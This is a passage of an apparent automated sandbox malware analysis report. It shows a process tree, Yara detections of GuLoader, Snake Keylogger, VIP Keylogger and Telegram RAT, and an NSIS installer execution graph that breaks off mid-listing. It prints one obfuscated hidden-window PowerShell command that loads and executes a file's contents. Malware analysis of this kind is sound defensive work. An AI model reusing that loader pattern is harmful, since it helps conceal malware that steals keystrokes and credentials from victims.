                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:11:15:16
                                                                                                                                            Start date:10/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) "
                                                                                                                                            Imagebase:0x5e0000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:11:15:17
                                                                                                                                            Start date:10/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:11:17:05
                                                                                                                                            Start date:10/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                            Imagebase:0x3a0000
                                                                                                                                            File size:59'904 bytes
                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.3798575873.00000000043F8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:23.7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:21.4%
                                                                                                                                              Total number of Nodes:1357
                                                                                                                                              Total number of Limit Nodes:45
                                                                                                                                              execution_graph 4024 402840 4025 402bbf 18 API calls 4024->4025 4027 40284e 4025->4027 4026 402864 4029 405d33 2 API calls 4026->4029 4027->4026 4028 402bbf 18 API calls 4027->4028 4028->4026 4030 40286a 4029->4030 4052 405d58 GetFileAttributesW CreateFileW 4030->4052 4032 402877 4033 402883 GlobalAlloc 4032->4033 4034 40291a 4032->4034 4037 402911 CloseHandle 4033->4037 4038 40289c 4033->4038 4035 402922 DeleteFileW 4034->4035 4036 402935 4034->4036 4035->4036 4037->4034 4053 40336e SetFilePointer 4038->4053 4040 4028a2 4041 403358 ReadFile 4040->4041 4042 4028ab GlobalAlloc 4041->4042 4043 4028bb 4042->4043 4044 4028ef 4042->4044 4045 4030e7 45 API calls 4043->4045 4046 405e0a WriteFile 4044->4046 4047 4028c8 4045->4047 4048 4028fb GlobalFree 4046->4048 4050 4028e6 GlobalFree 4047->4050 4049 4030e7 45 API calls 4048->4049 4051 40290e 4049->4051 4050->4044 4051->4037 4052->4032 4053->4040 4054 401cc0 4055 402ba2 18 API calls 4054->4055 4056 401cc7 4055->4056 4057 402ba2 18 API calls 4056->4057 4058 401ccf GetDlgItem 4057->4058 4059 402531 4058->4059 4060 4029c0 4061 402ba2 18 API calls 4060->4061 4062 4029c6 4061->4062 4063 40281e 4062->4063 4064 4029f9 4062->4064 4066 4029d4 4062->4066 4064->4063 4065 4061a5 18 API calls 4064->4065 4065->4063 4066->4063 4068 4060ca wsprintfW 4066->4068 4068->4063 3238 401fc3 3239 401fd5 3238->3239 3240 402087 3238->3240 3258 402bbf 3239->3258 3242 401423 25 API calls 3240->3242 3248 4021e1 3242->3248 3244 402bbf 18 API calls 3245 401fe5 3244->3245 3246 401ffb LoadLibraryExW 3245->3246 3247 401fed GetModuleHandleW 3245->3247 3246->3240 3249 40200c 3246->3249 3247->3246 3247->3249 3264 4065c8 WideCharToMultiByte 3249->3264 3252 402056 3254 4052e2 25 API calls 3252->3254 3253 40201d 3256 40202d 3253->3256 3267 401423 3253->3267 3254->3256 3256->3248 3257 402079 FreeLibrary 3256->3257 3257->3248 3259 402bcb 3258->3259 3260 4061a5 18 API calls 3259->3260 3261 402bec 3260->3261 3262 401fdc 3261->3262 3263 406417 5 API calls 3261->3263 3262->3244 3263->3262 3265 4065f2 GetProcAddress 3264->3265 3266 402017 3264->3266 3265->3266 3266->3252 3266->3253 3268 4052e2 25 API calls 3267->3268 3269 401431 3268->3269 3269->3256 4069 4016c4 4070 402bbf 18 API calls 4069->4070 4071 4016ca GetFullPathNameW 4070->4071 4074 4016e4 4071->4074 4078 401706 4071->4078 4072 40171b GetShortPathNameW 4073 402a4c 4072->4073 4075 4064c6 2 API calls 4074->4075 4074->4078 4076 4016f6 4075->4076 4076->4078 4079 406183 lstrcpynW 4076->4079 4078->4072 4078->4073 4079->4078 4080 406847 4084 4066cb 4080->4084 4081 407036 4082 406755 GlobalAlloc 4082->4081 4082->4084 4083 40674c GlobalFree 4083->4082 4084->4081 4084->4082 4084->4083 4084->4084 4085 4067c3 GlobalFree 4084->4085 4086 4067cc GlobalAlloc 4084->4086 4085->4086 4086->4081 4086->4084 3454 4014cb 3455 4052e2 25 API calls 3454->3455 3456 4014d2 3455->3456 4087 40194e 4088 402bbf 18 API calls 4087->4088 4089 401955 lstrlenW 4088->4089 4090 402531 4089->4090 4091 4027ce 4092 4027d6 4091->4092 4093 4027da FindNextFileW 4092->4093 4095 4027ec 4092->4095 4094 402833 4093->4094 4093->4095 4097 406183 lstrcpynW 4094->4097 4097->4095 3533 401754 3534 402bbf 18 API calls 3533->3534 3535 40175b 3534->3535 3539 405d87 3535->3539 3537 401762 3538 405d87 2 API calls 3537->3538 3538->3537 3540 405d94 GetTickCount GetTempFileNameW 3539->3540 3541 405dce 3540->3541 3542 405dca 3540->3542 3541->3537 3542->3540 3542->3541 4105 405256 4106 405266 4105->4106 4107 40527a 4105->4107 4108 4052c3 4106->4108 4109 40526c 4106->4109 4110 405282 IsWindowVisible 4107->4110 4116 405299 4107->4116 4111 4052c8 CallWindowProcW 4108->4111 4112 404293 SendMessageW 4109->4112 4110->4108 4113 40528f 4110->4113 4114 405276 4111->4114 4112->4114 4118 404bac SendMessageW 4113->4118 4116->4111 4123 404c2c 4116->4123 4119 404c0b SendMessageW 4118->4119 4120 404bcf GetMessagePos ScreenToClient SendMessageW 4118->4120 4121 404c03 4119->4121 4120->4121 4122 404c08 4120->4122 4121->4116 4122->4119 4132 406183 lstrcpynW 4123->4132 4125 404c3f 4133 4060ca wsprintfW 4125->4133 4127 404c49 4128 40140b 2 API calls 4127->4128 4129 404c52 4128->4129 4134 406183 lstrcpynW 4129->4134 4131 404c59 4131->4108 4132->4125 4133->4127 4134->4131 4135 401d56 GetDC GetDeviceCaps 4136 402ba2 18 API calls 4135->4136 4137 401d74 MulDiv ReleaseDC 4136->4137 4138 402ba2 18 API calls 4137->4138 4139 401d93 4138->4139 4140 4061a5 18 API calls 4139->4140 4141 401dcc CreateFontIndirectW 4140->4141 4142 402531 4141->4142 4143 401a57 4144 402ba2 18 API calls 4143->4144 4145 401a5d 4144->4145 4146 402ba2 18 API calls 4145->4146 4147 401a05 4146->4147 4148 4014d7 4149 402ba2 18 API calls 4148->4149 4150 4014dd Sleep 4149->4150 4152 402a4c 4150->4152 4153 40435b lstrcpynW lstrlenW 4154 40155b 4155 4029f2 4154->4155 4158 4060ca wsprintfW 4155->4158 4157 4029f7 4158->4157 3972 401ddc 3973 402ba2 18 API calls 3972->3973 3974 401de2 3973->3974 3975 402ba2 18 API calls 3974->3975 3976 401deb 3975->3976 3977 401df2 ShowWindow 3976->3977 3978 401dfd EnableWindow 3976->3978 3979 402a4c 3977->3979 3978->3979 4159 404c5e GetDlgItem GetDlgItem 4160 404cb0 7 API calls 4159->4160 4168 404ec9 4159->4168 4161 404d53 DeleteObject 4160->4161 4162 404d46 SendMessageW 4160->4162 4163 404d5c 4161->4163 4162->4161 4165 404d93 4163->4165 4167 4061a5 18 API calls 4163->4167 4164 404fad 4166 405059 4164->4166 4175 405006 SendMessageW 4164->4175 4202 404ebc 4164->4202 4169 404247 19 API calls 4165->4169 4171 405063 SendMessageW 4166->4171 4172 40506b 4166->4172 4173 404d75 SendMessageW SendMessageW 4167->4173 4168->4164 4170 404f3a 4168->4170 4179 404bac 5 API calls 4168->4179 4174 404da7 4169->4174 4170->4164 4177 404f9f SendMessageW 4170->4177 4171->4172 4178 405094 4172->4178 4185 405084 4172->4185 4186 40507d ImageList_Destroy 4172->4186 4173->4163 4180 404247 19 API calls 4174->4180 4183 40501b SendMessageW 4175->4183 4175->4202 4176 4042ae 8 API calls 4184 40524f 4176->4184 4177->4164 4182 405203 4178->4182 4201 404c2c 4 API calls 4178->4201 4206 4050cf 4178->4206 4179->4170 4181 404db5 4180->4181 4187 404e8a GetWindowLongW SetWindowLongW 4181->4187 4195 404e05 SendMessageW 4181->4195 4197 404e84 4181->4197 4199 404e41 SendMessageW 4181->4199 4200 404e52 SendMessageW 4181->4200 4190 405215 ShowWindow GetDlgItem ShowWindow 4182->4190 4182->4202 4189 40502e 4183->4189 4185->4178 4188 40508d GlobalFree 4185->4188 4186->4185 4191 404ea3 4187->4191 4188->4178 4196 40503f SendMessageW 4189->4196 4190->4202 4192 404ec1 4191->4192 4193 404ea9 ShowWindow 4191->4193 4211 40427c SendMessageW 4192->4211 4210 40427c SendMessageW 4193->4210 4195->4181 4196->4166 4197->4187 4197->4191 4199->4181 4200->4181 4201->4206 4202->4176 4203 4051d9 InvalidateRect 4203->4182 4204 4051ef 4203->4204 4212 404b67 4204->4212 4205 4050fd SendMessageW 4209 405113 4205->4209 4206->4205 4206->4209 4208 405187 SendMessageW SendMessageW 4208->4209 4209->4203 4209->4208 4210->4202 4211->4168 4215 404a9e 4212->4215 4214 404b7c 4214->4182 4216 404ab7 4215->4216 4217 4061a5 18 API calls 4216->4217 4218 404b1b 4217->4218 4219 4061a5 18 API calls 4218->4219 4220 404b26 4219->4220 4221 4061a5 18 API calls 4220->4221 4222 404b3c lstrlenW wsprintfW SetDlgItemTextW 4221->4222 4222->4214 4223 401bdf 4224 402ba2 18 API calls 4223->4224 4225 401be6 4224->4225 4226 402ba2 18 API calls 4225->4226 4227 401bf0 4226->4227 4229 401c00 4227->4229 4230 402bbf 18 API calls 4227->4230 4228 401c10 4232 401c1b 4228->4232 4233 401c5f 4228->4233 4229->4228 4231 402bbf 18 API calls 4229->4231 4230->4229 4231->4228 4234 402ba2 18 API calls 4232->4234 4235 402bbf 18 API calls 4233->4235 4236 401c20 4234->4236 4237 401c64 4235->4237 4238 402ba2 18 API calls 4236->4238 4239 402bbf 18 API calls 4237->4239 4241 401c29 4238->4241 4240 401c6d FindWindowExW 4239->4240 4244 401c8f 4240->4244 4242 401c31 SendMessageTimeoutW 4241->4242 4243 401c4f SendMessageW 4241->4243 4242->4244 4243->4244 4245 4022df 4246 402bbf 18 API calls 4245->4246 4247 4022ee 4246->4247 4248 402bbf 18 API calls 4247->4248 4249 4022f7 4248->4249 4250 402bbf 18 API calls 4249->4250 4251 402301 GetPrivateProfileStringW 4250->4251 4252 401960 4253 402ba2 18 API calls 4252->4253 4254 401967 4253->4254 4255 402ba2 18 API calls 4254->4255 4256 401971 4255->4256 4257 402bbf 18 API calls 4256->4257 4258 40197a 4257->4258 4259 40198e lstrlenW 4258->4259 4260 4019ca 4258->4260 4261 401998 4259->4261 4261->4260 4265 406183 lstrcpynW 4261->4265 4263 4019b3 4263->4260 4264 4019c0 lstrlenW 4263->4264 4264->4260 4265->4263 4266 401662 4267 402bbf 18 API calls 4266->4267 4268 401668 4267->4268 4269 4064c6 2 API calls 4268->4269 4270 40166e 4269->4270 4271 4046e2 4272 40470e 4271->4272 4273 40471f 4271->4273 4332 4058ac GetDlgItemTextW 4272->4332 4275 40472b GetDlgItem 4273->4275 4276 40478a 4273->4276 4278 40473f 4275->4278 4283 4061a5 18 API calls 4276->4283 4293 40486e 4276->4293 4330 404a1d 4276->4330 4277 404719 4279 406417 5 API calls 4277->4279 4281 404753 SetWindowTextW 4278->4281 4282 405be2 4 API calls 4278->4282 4279->4273 4285 404247 19 API calls 4281->4285 4287 404749 4282->4287 4288 4047fe SHBrowseForFolderW 4283->4288 4284 40489e 4289 405c3f 18 API calls 4284->4289 4290 40476f 4285->4290 4286 4042ae 8 API calls 4291 404a31 4286->4291 4287->4281 4296 405b37 3 API calls 4287->4296 4292 404816 CoTaskMemFree 4288->4292 4288->4293 4294 4048a4 4289->4294 4295 404247 19 API calls 4290->4295 4297 405b37 3 API calls 4292->4297 4293->4330 4334 4058ac GetDlgItemTextW 4293->4334 4335 406183 lstrcpynW 4294->4335 4298 40477d 4295->4298 4296->4281 4299 404823 4297->4299 4333 40427c SendMessageW 4298->4333 4302 40485a SetDlgItemTextW 4299->4302 4307 4061a5 18 API calls 4299->4307 4302->4293 4303 404783 4305 406559 5 API calls 4303->4305 4304 4048bb 4306 406559 5 API calls 4304->4306 4305->4276 4313 4048c2 4306->4313 4308 404842 lstrcmpiW 4307->4308 4308->4302 4311 404853 lstrcatW 4308->4311 4309 404903 4336 406183 lstrcpynW 4309->4336 4311->4302 4312 40490a 4314 405be2 4 API calls 4312->4314 4313->4309 4317 405b83 2 API calls 4313->4317 4319 40495b 4313->4319 4315 404910 GetDiskFreeSpaceW 4314->4315 4318 404934 MulDiv 4315->4318 4315->4319 4317->4313 4318->4319 4320 4049cc 4319->4320 4322 404b67 21 API calls 4319->4322 4321 4049ef 4320->4321 4323 40140b 2 API calls 4320->4323 4337 404269 KiUserCallbackDispatcher 4321->4337 4324 4049b9 4322->4324 4323->4321 4326 4049ce SetDlgItemTextW 4324->4326 4327 4049be 4324->4327 4326->4320 4329 404a9e 21 API calls 4327->4329 4328 404a0b 4328->4330 4338 404677 4328->4338 4329->4320 4330->4286 4332->4277 4333->4303 4334->4284 4335->4304 4336->4312 4337->4328 4339 404685 4338->4339 4340 40468a SendMessageW 4338->4340 4339->4340 4340->4330 4341 4043e4 4342 4043fc 4341->4342 4346 404516 4341->4346 4347 404247 19 API calls 4342->4347 4343 404580 4344 404652 4343->4344 4345 40458a GetDlgItem 4343->4345 4352 4042ae 8 API calls 4344->4352 4348 404613 4345->4348 4349 4045a4 4345->4349 4346->4343 4346->4344 4350 404551 GetDlgItem SendMessageW 4346->4350 4351 404463 4347->4351 4348->4344 4353 404625 4348->4353 4349->4348 4356 4045ca 6 API calls 4349->4356 4372 404269 KiUserCallbackDispatcher 4350->4372 4355 404247 19 API calls 4351->4355 4362 40464d 4352->4362 4357 40463b 4353->4357 4358 40462b SendMessageW 4353->4358 4360 404470 CheckDlgButton 4355->4360 4356->4348 4361 404641 SendMessageW 4357->4361 4357->4362 4358->4357 4359 40457b 4363 404677 SendMessageW 4359->4363 4370 404269 KiUserCallbackDispatcher 4360->4370 4361->4362 4363->4343 4365 40448e GetDlgItem 4371 40427c SendMessageW 4365->4371 4367 4044a4 SendMessageW 4368 4044c1 GetSysColor 4367->4368 4369 4044ca SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4367->4369 4368->4369 4369->4362 4370->4365 4371->4367 4372->4359 4373 4019e4 4374 402bbf 18 API calls 4373->4374 4375 4019eb 4374->4375 4376 402bbf 18 API calls 4375->4376 4377 4019f4 4376->4377 4378 4019fb lstrcmpiW 4377->4378 4379 401a0d lstrcmpW 4377->4379 4380 401a01 4378->4380 4379->4380 4381 4025e5 4382 402ba2 18 API calls 4381->4382 4389 4025f4 4382->4389 4383 40272d 4384 40263a ReadFile 4384->4383 4384->4389 4385 405ddb ReadFile 4385->4389 4386 40267a MultiByteToWideChar 4386->4389 4387 40272f 4403 4060ca wsprintfW 4387->4403 4389->4383 4389->4384 4389->4385 4389->4386 4389->4387 4391 4026a0 SetFilePointer MultiByteToWideChar 4389->4391 4393 402740 4389->4393 4394 405e39 SetFilePointer 4389->4394 4391->4389 4392 402761 SetFilePointer 4392->4383 4393->4383 4393->4392 4395 405e55 4394->4395 4396 405e71 4394->4396 4397 405ddb ReadFile 4395->4397 4396->4389 4398 405e61 4397->4398 4398->4396 4399 405ea2 SetFilePointer 4398->4399 4400 405e7a SetFilePointer 4398->4400 4399->4396 4400->4399 4401 405e85 4400->4401 4402 405e0a WriteFile 4401->4402 4402->4396 4403->4383 3270 401e66 3271 402bbf 18 API calls 3270->3271 3272 401e6c 3271->3272 3273 4052e2 25 API calls 3272->3273 3274 401e76 3273->3274 3288 405863 CreateProcessW 3274->3288 3277 401edb CloseHandle 3280 40281e 3277->3280 3278 401e8c WaitForSingleObject 3279 401e9e 3278->3279 3281 401eb0 GetExitCodeProcess 3279->3281 3291 406595 3279->3291 3283 401ec2 3281->3283 3284 401ecf 3281->3284 3295 4060ca wsprintfW 3283->3295 3284->3277 3285 401ecd 3284->3285 3285->3277 3289 401e7c 3288->3289 3290 405896 CloseHandle 3288->3290 3289->3277 3289->3278 3289->3280 3290->3289 3292 4065b2 PeekMessageW 3291->3292 3293 401ea5 WaitForSingleObject 3292->3293 3294 4065a8 DispatchMessageW 3292->3294 3293->3279 3294->3292 3295->3285 4404 406ae6 4406 4066cb 4404->4406 4405 407036 4406->4405 4407 406755 GlobalAlloc 4406->4407 4408 40674c GlobalFree 4406->4408 4409 4067c3 GlobalFree 4406->4409 4410 4067cc GlobalAlloc 4406->4410 4407->4405 4407->4406 4408->4407 4409->4410 4410->4405 4410->4406 3296 401767 3297 402bbf 18 API calls 3296->3297 3298 40176e 3297->3298 3299 401796 3298->3299 3300 40178e 3298->3300 3354 406183 lstrcpynW 3299->3354 3353 406183 lstrcpynW 3300->3353 3303 401794 3307 406417 5 API calls 3303->3307 3304 4017a1 3355 405b37 lstrlenW CharPrevW 3304->3355 3320 4017b3 3307->3320 3311 4017c5 CompareFileTime 3311->3320 3312 401885 3313 4052e2 25 API calls 3312->3313 3315 40188f 3313->3315 3314 406183 lstrcpynW 3314->3320 3338 4030e7 3315->3338 3316 4052e2 25 API calls 3317 401871 3316->3317 3320->3311 3320->3312 3320->3314 3322 4061a5 18 API calls 3320->3322 3333 40185c 3320->3333 3334 405d33 GetFileAttributesW 3320->3334 3337 405d58 GetFileAttributesW CreateFileW 3320->3337 3358 4064c6 FindFirstFileW 3320->3358 3361 4058c8 3320->3361 3321 4018b6 SetFileTime 3323 4018c8 CloseHandle 3321->3323 3322->3320 3323->3317 3324 4018d9 3323->3324 3325 4018f1 3324->3325 3326 4018de 3324->3326 3327 4061a5 18 API calls 3325->3327 3328 4061a5 18 API calls 3326->3328 3329 4018f9 3327->3329 3331 4018e6 lstrcatW 3328->3331 3332 4058c8 MessageBoxIndirectW 3329->3332 3331->3329 3332->3317 3333->3316 3333->3317 3335 405d52 3334->3335 3336 405d45 SetFileAttributesW 3334->3336 3335->3320 3336->3335 3337->3320 3339 403112 3338->3339 3340 4030f6 SetFilePointer 3338->3340 3365 4031ef GetTickCount 3339->3365 3340->3339 3345 4031ef 43 API calls 3346 403149 3345->3346 3348 4031b5 ReadFile 3346->3348 3351 403158 3346->3351 3352 4018a2 3346->3352 3348->3352 3349 405ddb ReadFile 3349->3351 3351->3349 3351->3352 3380 405e0a WriteFile 3351->3380 3352->3321 3352->3323 3353->3303 3354->3304 3356 405b53 lstrcatW 3355->3356 3357 4017a7 lstrcatW 3355->3357 3356->3357 3357->3303 3359 4064e7 3358->3359 3360 4064dc FindClose 3358->3360 3359->3320 3360->3359 3362 4058dd 3361->3362 3363 405929 3362->3363 3364 4058f1 MessageBoxIndirectW 3362->3364 3363->3320 3364->3363 3366 403347 3365->3366 3367 40321d 3365->3367 3368 402d9f 33 API calls 3366->3368 3382 40336e SetFilePointer 3367->3382 3374 403119 3368->3374 3370 403228 SetFilePointer 3376 40324d 3370->3376 3374->3352 3378 405ddb ReadFile 3374->3378 3375 405e0a WriteFile 3375->3376 3376->3374 3376->3375 3377 403328 SetFilePointer 3376->3377 3383 403358 3376->3383 3386 406698 3376->3386 3393 402d9f 3376->3393 3377->3366 3379 403132 3378->3379 3379->3345 3379->3352 3381 405e28 3380->3381 3381->3351 3382->3370 3384 405ddb ReadFile 3383->3384 3385 40336b 3384->3385 3385->3376 3387 4066bd 3386->3387 3388 4066c5 3386->3388 3387->3376 3388->3387 3389 406755 GlobalAlloc 3388->3389 3390 40674c GlobalFree 3388->3390 3391 4067c3 GlobalFree 3388->3391 3392 4067cc GlobalAlloc 3388->3392 3389->3387 3389->3388 3390->3389 3391->3392 3392->3387 3392->3388 3394 402db0 3393->3394 3395 402dc8 3393->3395 3396 402dc0 3394->3396 3397 402db9 DestroyWindow 3394->3397 3398 402dd0 3395->3398 3399 402dd8 GetTickCount 3395->3399 3396->3376 3397->3396 3400 406595 2 API calls 3398->3400 3399->3396 3401 402de6 3399->3401 3400->3396 3402 402e1b CreateDialogParamW ShowWindow 3401->3402 3403 402dee 3401->3403 3402->3396 3403->3396 3408 402d83 3403->3408 3405 402dfc wsprintfW 3406 4052e2 25 API calls 3405->3406 3407 402e19 3406->3407 3407->3396 3409 402d92 3408->3409 3410 402d94 MulDiv 3408->3410 3409->3410 3410->3405 4411 401ee9 4412 402bbf 18 API calls 4411->4412 4413 401ef0 4412->4413 4414 4064c6 2 API calls 4413->4414 4415 401ef6 4414->4415 4417 401f07 4415->4417 4418 4060ca wsprintfW 4415->4418 4418->4417 3423 4021ea 3424 402bbf 18 API calls 3423->3424 3425 4021f0 3424->3425 3426 402bbf 18 API calls 3425->3426 3427 4021f9 3426->3427 3428 402bbf 18 API calls 3427->3428 3429 402202 3428->3429 3430 4064c6 2 API calls 3429->3430 3431 40220b 3430->3431 3432 40221c lstrlenW lstrlenW 3431->3432 3433 40220f 3431->3433 3435 4052e2 25 API calls 3432->3435 3434 4052e2 25 API calls 3433->3434 3437 402217 3433->3437 3434->3437 3436 40225a SHFileOperationW 3435->3436 3436->3433 3436->3437 4419 40156b 4420 401584 4419->4420 4421 40157b ShowWindow 4419->4421 4422 401592 ShowWindow 4420->4422 4423 402a4c 4420->4423 4421->4420 4422->4423 4424 40226e 4425 402275 4424->4425 4428 402288 4424->4428 4426 4061a5 18 API calls 4425->4426 4427 402282 4426->4427 4429 4058c8 MessageBoxIndirectW 4427->4429 4429->4428 3457 403d6f 3458 403ec2 3457->3458 3459 403d87 3457->3459 3461 403ed3 GetDlgItem GetDlgItem 3458->3461 3470 403f13 3458->3470 3459->3458 3460 403d93 3459->3460 3462 403db1 3460->3462 3463 403d9e SetWindowPos 3460->3463 3464 404247 19 API calls 3461->3464 3467 403db6 ShowWindow 3462->3467 3468 403dce 3462->3468 3463->3462 3469 403efd SetClassLongW 3464->3469 3465 403f6d 3466 404293 SendMessageW 3465->3466 3475 403ebd 3465->3475 3517 403f7f 3466->3517 3467->3468 3471 403df0 3468->3471 3472 403dd6 DestroyWindow 3468->3472 3473 40140b 2 API calls 3469->3473 3470->3465 3474 401389 2 API calls 3470->3474 3477 403df5 SetWindowLongW 3471->3477 3478 403e06 3471->3478 3476 4041d0 3472->3476 3473->3470 3479 403f45 3474->3479 3476->3475 3486 404201 ShowWindow 3476->3486 3477->3475 3482 403e12 GetDlgItem 3478->3482 3483 403eaf 3478->3483 3479->3465 3484 403f49 SendMessageW 3479->3484 3480 40140b 2 API calls 3480->3517 3481 4041d2 DestroyWindow EndDialog 3481->3476 3487 403e42 3482->3487 3488 403e25 SendMessageW IsWindowEnabled 3482->3488 3485 4042ae 8 API calls 3483->3485 3484->3475 3485->3475 3486->3475 3490 403e4f 3487->3490 3491 403e96 SendMessageW 3487->3491 3492 403e62 3487->3492 3500 403e47 3487->3500 3488->3475 3488->3487 3489 4061a5 18 API calls 3489->3517 3490->3491 3490->3500 3491->3483 3495 403e6a 3492->3495 3496 403e7f 3492->3496 3493 404220 SendMessageW 3497 403e7d 3493->3497 3494 404247 19 API calls 3494->3517 3530 40140b 3495->3530 3499 40140b 2 API calls 3496->3499 3497->3483 3501 403e86 3499->3501 3500->3493 3501->3483 3501->3500 3502 404247 19 API calls 3503 403ffa GetDlgItem 3502->3503 3504 404017 ShowWindow KiUserCallbackDispatcher 3503->3504 3505 40400f 3503->3505 3527 404269 KiUserCallbackDispatcher 3504->3527 3505->3504 3507 404041 EnableWindow 3510 404055 3507->3510 3508 40405a GetSystemMenu EnableMenuItem SendMessageW 3509 40408a SendMessageW 3508->3509 3508->3510 3509->3510 3510->3508 3528 40427c SendMessageW 3510->3528 3529 406183 lstrcpynW 3510->3529 3513 4040b8 lstrlenW 3514 4061a5 18 API calls 3513->3514 3515 4040ce SetWindowTextW 3514->3515 3516 401389 2 API calls 3515->3516 3516->3517 3517->3475 3517->3480 3517->3481 3517->3489 3517->3494 3517->3502 3518 404112 DestroyWindow 3517->3518 3518->3476 3519 40412c CreateDialogParamW 3518->3519 3519->3476 3520 40415f 3519->3520 3521 404247 19 API calls 3520->3521 3522 40416a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3521->3522 3523 401389 2 API calls 3522->3523 3524 4041b0 3523->3524 3524->3475 3525 4041b8 ShowWindow 3524->3525 3526 404293 SendMessageW 3525->3526 3526->3476 3527->3507 3528->3510 3529->3513 3531 401389 2 API calls 3530->3531 3532 401420 3531->3532 3532->3500 4430 4014f1 SetForegroundWindow 4431 402a4c 4430->4431 4432 401673 4433 402bbf 18 API calls 4432->4433 4434 40167a 4433->4434 4435 402bbf 18 API calls 4434->4435 4436 401683 4435->4436 4437 402bbf 18 API calls 4436->4437 4438 40168c MoveFileW 4437->4438 4439 40169f 4438->4439 4445 401698 4438->4445 4440 4064c6 2 API calls 4439->4440 4443 4021e1 4439->4443 4442 4016ae 4440->4442 4441 401423 25 API calls 4441->4443 4442->4443 4444 406024 38 API calls 4442->4444 4444->4445 4445->4441 4446 401cfa GetDlgItem GetClientRect 4447 402bbf 18 API calls 4446->4447 4448 401d2c LoadImageW SendMessageW 4447->4448 4449 401d4a DeleteObject 4448->4449 4450 402a4c 4448->4450 4449->4450 3942 4027fb 3943 402bbf 18 API calls 3942->3943 3944 402802 FindFirstFileW 3943->3944 3945 40282a 3944->3945 3949 402815 3944->3949 3946 402833 3945->3946 3950 4060ca wsprintfW 3945->3950 3951 406183 lstrcpynW 3946->3951 3950->3946 3951->3949 3952 40237b 3953 402381 3952->3953 3954 402bbf 18 API calls 3953->3954 3955 402393 3954->3955 3956 402bbf 18 API calls 3955->3956 3957 40239d RegCreateKeyExW 3956->3957 3958 4023c7 3957->3958 3959 402a4c 3957->3959 3960 4023e2 3958->3960 3961 402bbf 18 API calls 3958->3961 3965 4023ee 3960->3965 3969 402ba2 3960->3969 3962 4023d8 lstrlenW 3961->3962 3962->3960 3964 402409 RegSetValueExW 3967 40241f RegCloseKey 3964->3967 3965->3964 3966 4030e7 45 API calls 3965->3966 3966->3964 3967->3959 3970 4061a5 18 API calls 3969->3970 3971 402bb6 3970->3971 3971->3965 4465 4014ff 4466 401507 4465->4466 4468 40151a 4465->4468 4467 402ba2 18 API calls 4466->4467 4467->4468 4469 401000 4470 401037 BeginPaint GetClientRect 4469->4470 4471 40100c DefWindowProcW 4469->4471 4473 4010f3 4470->4473 4474 401179 4471->4474 4475 401073 CreateBrushIndirect FillRect DeleteObject 4473->4475 4476 4010fc 4473->4476 4475->4473 4477 401102 CreateFontIndirectW 4476->4477 4478 401167 EndPaint 4476->4478 4477->4478 4479 401112 6 API calls 4477->4479 4478->4474 4479->4478 4480 401904 4481 40193b 4480->4481 4482 402bbf 18 API calls 4481->4482 4483 401940 4482->4483 4484 405974 69 API calls 4483->4484 4485 401949 4484->4485 4486 402d04 4487 402d16 SetTimer 4486->4487 4488 402d2f 4486->4488 4487->4488 4489 402d7d 4488->4489 4490 402d83 MulDiv 4488->4490 4491 402d3d wsprintfW SetWindowTextW SetDlgItemTextW 4490->4491 4491->4489 4500 402786 4501 40278d 4500->4501 4503 4029f7 4500->4503 4502 402ba2 18 API calls 4501->4502 4504 402798 4502->4504 4505 40279f SetFilePointer 4504->4505 4505->4503 4506 4027af 4505->4506 4508 4060ca wsprintfW 4506->4508 4508->4503 4509 401907 4510 402bbf 18 API calls 4509->4510 4511 40190e 4510->4511 4512 4058c8 MessageBoxIndirectW 4511->4512 4513 401917 4512->4513 3411 401e08 3412 402bbf 18 API calls 3411->3412 3413 401e0e 3412->3413 3414 402bbf 18 API calls 3413->3414 3415 401e17 3414->3415 3416 